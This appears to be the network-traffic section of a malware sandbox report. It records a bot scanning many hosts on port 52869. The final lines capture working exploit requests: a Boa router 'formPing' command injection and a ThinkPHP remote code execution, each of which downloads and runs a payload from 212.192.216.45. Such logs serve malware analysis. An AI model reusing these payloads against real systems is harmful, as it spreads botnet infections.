| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.16.253.186:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.150.36.3:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.160.125.103:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.251.62.121:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.37.101.83:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.124.212.211:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.211.35.212:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.44.7.22:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.69.217.194:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.192.60.145:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.172.210.253:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.0.179.187:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.149.20.228:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.107.139.64:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.18.14.72:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.119.156.177:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.186.182.104:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.42.132.115:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.254.213.208:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.158.122.248:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.105.143.51:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.211.36.231:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.255.110.184:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.116.0.233:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.176.5.44:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.221.78.20:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.54.222.80:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.136.188.42:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.151.105.114:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.7.228.75:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.254.177.55:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.145.216.130:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.182.27.104:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.178.97.95:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.202.104.0:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.20.209.214:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.49.180.109:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.121.152.166:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.117.168.74:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.69.231.17:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.32.151.229:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.82.250.255:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.111.65.130:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.147.91.153:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.231.54.188:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.64.136.139:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.135.81.137:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.14.146.55:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.238.237.139:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.198.170.84:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.110.41.71:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.45.99.246:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.35.240.75:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.229.98.70:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.191.131.97:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.199.111.191:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.148.247.51:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.254.104.152:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.53.67.208:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.65.230.99:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.212.88.219:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.180.44.162:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.155.184.179:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.224.130.221:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.189.75.198:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.125.226.9:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.126.92.183:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.9.137.21:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.113.243.69:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.203.206.220:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.146.102.76:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.1.18.40:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.153.245.70:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.1.196.95:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.28.128.230:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.173.191.166:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.95.147.44:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.136.48.217:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.246.113.184:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.128.18.155:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.117.66.255:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.165.252.237:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.92.10.45:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.202.205.159:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.6.18.83:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.67.4.180:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.144.221.111:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.79.25.211:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.15.254.4:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.251.79.197:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.161.15.178:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.54.193.90:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.198.93.34:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.22.38.217:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.114.44.47:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.14.124.112:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.103.174.230:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.181.2.235:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.40.136.172:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.152.102.78:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.73.157.238:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.57.151.249:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.212.26.161:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.185.33.125:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.217.255.73:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.1.72.96:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.176.132.218:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.99.113.85:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.93.253.250:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.11.130.219:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.127.187.228:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.189.124.150:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.42.116.227:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.29.245.185:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.31.67.102:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.40.218.7:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.126.243.53:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.127.113.170:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.79.155.90:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.131.163.222:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.232.177.112:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.215.31.186:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.129.51.207:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.203.47.44:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.29.184.27:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.26.100.174:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.55.170.111:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.230.189.160:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.137.47.75:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.6.46.38:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.183.240.234:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.147.239.99:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.89.234.41:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.88.223.180:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.162.167.190:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.85.188.121:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.107.10.228:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.199.19.26:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.56.211.32:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.160.81.80:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.68.79.159:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.42.78.168:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.165.189.160:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.69.253.100:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.165.191.50:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.13.94.151:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.15.233.254:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.5.98.97:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.167.49.155:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.230.235.1:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.92.144.113:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.14.233.142:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.78.93.238:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.130.144.87:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.87.237.230:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.23.9.171:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.16.220.132:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.187.199.197:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.201.205.245:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.243.88.26:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.20.23.119:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.188.241.138:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.127.196.93:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.82.250.76:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.135.97.155:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.25.204.91:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.98.92.207:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.52.209.220:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.26.12.154:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.158.241.32:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.69.141.246:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.208.191.238:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.12.166.175:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.121.53.100:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.8.46.1:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.89.164.119:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.4.226.33:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.196.37.239:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.86.144.75:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.27.52.125:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.39.184.141:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.196.171.94:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.11.6.255:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.163.224.252:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.232.205.250:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.211.4.213:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.212.94.153:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.138.168.39:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.239.115.214:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.254.32.145:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.97.152.164:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.42.29.43:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.128.129.199:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.178.101.73:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.34.47.226:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.17.81.176:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.57.229.8:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.82.255.110:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.140.118.173:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.209.98.216:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.227.168.34:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.53.65.160:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.109.28.247:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.144.222.214:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.222.217.156:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.95.121.193:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.45.174.46:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.52.13.92:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.204.52.234:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.31.231.109:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.134.119.160:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.176.136.116:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.227.114.64:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.70.28.243:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.173.160.216:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.131.87.240:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.133.21.41:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.157.117.85:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.102.97.41:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.20.20.45:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.134.231.98:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.123.58.2:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.240.24.192:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.91.75.126:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.3.4.73:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.86.94.39:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.139.116.251:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.162.252.134:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.178.6.135:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.179.88.94:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.169.41.66:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.27.178.39:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.190.119.141:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.254.208.135:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.137.99.200:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.102.80.137:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.121.209.246:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.185.108.98:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.45.21.72:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.62.53.119:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.5.159.4:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.93.130.25:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.78.84.39:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.113.212.130:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.69.97.185:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.212.219.6:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.136.227.94:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.202.131.5:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.179.226.254:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.22.181.75:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.252.29.117:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.64.63.38:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.217.68.196:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.193.4.36:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.175.10.121:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.119.52.190:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.187.32.36:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.61.93.34:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.226.170.210:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.126.28.229:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.176.162.114:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.123.53.197:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.184.5.187:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.56.252.190:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.12.69.193:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.132.138.230:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.71.216.158:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.10.241.94:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.136.240.162:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.254.141.51:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.240.158.131:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.197.46.250:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.55.214.248:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.166.54.113:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.255.247.172:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.254.76.188:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.105.223.208:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.57.251.195:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.109.215.231:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.73.161.59:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.8.252.24:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.235.135.89:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.213.58.244:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.73.141.129:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.77.232.32:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.50.75.147:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.176.76.152:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.74.16.11:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.22.161.215:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.136.19.51:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.26.46.168:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.172.191.209:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.243.200.130:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.195.31.51:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.79.108.222:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.255.106.95:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.143.19.12:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.146.182.136:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.200.10.110:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.41.100.144:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.15.241.28:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.123.10.209:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.44.16.213:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.246.161.207:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.63.208.175:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.205.63.151:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.79.53.153:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.75.181.149:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.105.75.244:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.15.151.98:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.106.117.254:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.94.75.53:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.130.105.186:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.171.134.194:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.96.245.36:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.103.238.239:52869 |
| Source: global traffic | TCP traffic: 192.168.2.23:57888 -> 180.105.166.96:52869 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
